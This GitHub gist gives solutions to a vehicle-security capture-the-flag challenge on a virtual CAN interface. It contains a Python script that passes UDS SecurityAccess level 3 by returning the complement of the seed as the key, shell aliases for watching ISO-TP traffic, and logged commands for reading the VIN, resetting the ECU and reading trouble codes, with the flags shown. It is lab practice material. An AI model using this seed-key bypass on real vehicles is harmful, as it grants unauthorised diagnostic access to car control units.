Skip to content

Instantly share code, notes, and snippets.

@genhack

genhack/Vsec.txt

Last active May 9, 2025 15:00
Show Gist options
  • Save genhack/fe6797379056de60be1239aa8c9e2887 to your computer and use it in GitHub Desktop.
Save genhack/fe6797379056de60be1239aa8c9e2887 to your computer and use it in GitHub Desktop.
Download ZIP
VSec Challenge Alias and Solutions.
Raw
l3.py
#!/usr/bin/env python3
import sys
import subprocess
import tempfile
import time
import os
import signal
import re
def usage():
print(f"Uso: {sys.argv[0]} <iface> <TxID es.7E0> <RxID es.7E8>")
sys.exit(1)
if len(sys.argv) != 4:
usage()
iface, txid, rxid = sys.argv[1:]
# 1) Avvia isotpdump in background, cattura stdout
tmp = tempfile.NamedTemporaryFile(delete=False, mode='w+t')
proc = subprocess.Popen(
["isotpdump", "-s", txid, "-d", rxid, "-a", "-u", iface],
stdout=subprocess.PIPE,
stderr=subprocess.DEVNULL,
universal_newlines=True,
bufsize=1 # line-buffered
)
print(f"==> Avviato isotpdump (pid {proc.pid}), log in {tmp.name}")
def cleanup():
try:
proc.kill()
except:
pass
tmp.close()
# non cancelliamo il file per debug
import atexit
atexit.register(cleanup)
# 2) Entra in DiagnosticSession Level3
print("==> Inoltro DiagnosticSessionControl (10 03)")
subprocess.run(
["isotpsend", "-p", "00", "-s", txid, "-d", rxid, iface],
input="10 03\n", universal_newlines=True
)
time.sleep(0.1)
# 3) Richiedi il seed
print("==> Inoltro SecurityAccess Request Seed (27 03)")
subprocess.run(
["isotpsend", "-p", "00", "-s", txid, "-d", rxid, iface],
input="27 03\n", universal_newlines=True
)
# 4) Leggi linee fino a timeout o seed trovato
seed_line = None
deadline = time.time() + 2.0
pattern = re.compile(r'\b67 03 ([0-9A-Fa-f]{2}) ([0-9A-Fa-f]{2})\b')
while time.time() < deadline:
line = proc.stdout.readline()
if not line:
break
tmp.write(line)
tmp.flush()
sys.stdout.write(line)
m = pattern.search(line)
if m:
seed_hi, seed_lo = m.group(1), m.group(2)
seed_line = (seed_hi, seed_lo)
break
# 5) Ferma isotpdump
cleanup()
print("\n---- isotpdump output completo (in {}) ----".format(tmp.name))
os.system(f"cat {tmp.name}")
print("---- fine dump ----\n")
if not seed_line:
print("Errore: seed non ricevuto (timeout o pattern non trovato)", file=sys.stderr)
sys.exit(2)
# 6) Calcola seed e key
seed = (int(seed_line[0],16) << 8) | int(seed_line[1],16)
print(f"Ricevuto seed: 0x{seed:04X}")
key = (~seed) & 0xFFFF
print(f"Calcolata key: 0x{key:04X}")
# 7) Invia la key
hi = (key >> 8) & 0xFF
lo = key & 0xFF
cmd = f"27 04 {hi:02X} {lo:02X}\n"
print(f"==> Inoltro SecurityAccess Send Key ({cmd.strip()})")
subprocess.run(
["isotpsend", "-p", "00", "-s", txid, "-d", rxid, iface],
input=cmd, universal_newlines=True
)
print("==> Operazione completata.")
Raw
Vsec.txt
Wiki:
https://ramn.readthedocs.io/en/latest/userguide/diag_tutorial.html#
Command:
isotpdump -s 7E0 -d 7E8 -c -a -u vcan0
Alias:
alias ecuAD='candump vcan0 | grep "7E0\|7E8"'
alias ecuAF='candump vcan0 | grep "7E0\|7DF"'
alias iso-monitor='while true; do isotprecv -p 00 -s 7E0 -d 7E8 -l vcan0 | while read line; do echo "$line"; echo "$line" | xxd -r -p 2>/dev/null | hexdump -C; done; done'
alias iso-monitorF='while true; do isotprecv -p 00 -s 7E0 -d 7DF -l vcan0 | while read line; do echo "$line"; echo "$line" | xxd -r -p 2>/dev/null | hexdump -C; done; done'
Vin:
echo "22 F1 90" | isotpsend -p 00 -s 7E0 -d 7E8 vcan0
8fe34400a5d1:~$ ecuAD │8fe34400a5d1:~$ iso-monitor
vcan0 7E0 [8] 03 22 F1 90 00 00 00 00 │62 F1 90 66 6C 61 67 7B 76 31 6E 5F 42 48 6D 61 63 68 33 7D
vcan0 7E8 [8] 10 14 62 F1 90 66 6C 61 │00000000 62 f1 90 66 6c 61 67 7b 76 31 6e 5f 42 48 6d 61 |b..flag{v1n_BHma|
vcan0 7E0 [8] 30 00 00 00 00 00 00 00 │00000010 63 68 33 7d |ch3}|
vcan0 7E8 [8] 21 67 7B 76 31 6E 5F 42 │00000014
vcan0 7E8 [8] 22 48 6D 61 63 68 33 7D
Restart ecu:
8fe34400a5d1:~$ echo "11 01" | isotpsend -p 00 -s 7E0 -d 7DF vcan0
8fe34400a5d1:~$ ecuAF
vcan0 7E0 [8] 03 22 F1 90 00 00 00 00 │8fe34400a5d1:~$ iso-monitorF
vcan0 7E0 [8] 02 11 01 00 00 00 00 00 │67 30 47 72 65 33 6E
vcan0 7DF [8] 07 67 30 47 72 65 33 6E │00000000 67 30 47 72 65 33 6e |g0Gre3n|
│00000007
Engine Trouble:
echo "19 02 FF" | isotpsend -p 00 -s 7E0 -d 7E8 vcan0
fe34400a5d1:~$ isotpdump -s 7e0 -d 7e8 -a -u vcan0 │8fe34400a5d1:~$ isotprecv -p 00 -s 7E0 -d 7E8 -l vcan0
vcan0 7E0 [8] [SF] ln: 3 data: 19 02 FF 00 00 00 00 - '.......' - [SRQ] ReadDTCIn │59 02 FF 3E 9F 01 AB
formation │
vcan0 7E8 [8] [SF] ln: 7 data: 59 02 FF 3E 9F 01 AB - 'Y..>...' - [PSR] ReadDTCIn │
formation
Secrets in Memory:
Wip You Need loop there...
Security Access Level 3:
1.Request Diag Session #Tic Tac Tic Tac...Anti-Bruteforce starthere...
echo "10 03" | isotpsend -p 00 -s 7E0 -d 7E8 vcan0
vcan0 7E0 [8] [SF] ln: 2 data: 10 03 00 00 00 00 00 - '.......' - [SRQ] DiagnosticSessionControl
vcan0 7E8 [8] [SF] ln: 2 data: 50 03 00 00 00 00 00 - 'P......' - [PSR] DiagnosticSessionControl
2.Request Seed Level3
echo "27 03" | isotpsend -p 00 -s 7E0 -d 7E8 vcan0
vcan0 7E0 [8] [SF] ln: 2 data: 27 03 00 00 00 00 00 - ''......' - [SRQ] SecurityAccess
vcan0 7E8 [8] [SF] ln: 4 data: 67 03 9D C2 00 00 00 - 'g......' - [PSR] SecurityAccess
#0x9DC2
3.Xor or subtrackt 0xFFFF
SEED=0X9DC2
printf "%04X\n" $(( (~SEED)&0xFFFF ))
0x9DC2-0xFFFF = 0x623D
4.send the seed
echo "27 04 62 3D" | isotpsend -p 00 -s 7E0 -d 7E8 vcan0
vcan0 7E0 [8] [SF] ln: 4 data: 27 04 62 3D 00 00 00 - ''.b=...' - [SRQ] SecurityAccess
vcan0 7E8 [8] [SF] ln: 2 data: 67 04 00 00 00 00 00 - 'g......' - [PSR] SecurityAccess
#Access 00 00 on Sub-function 04
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment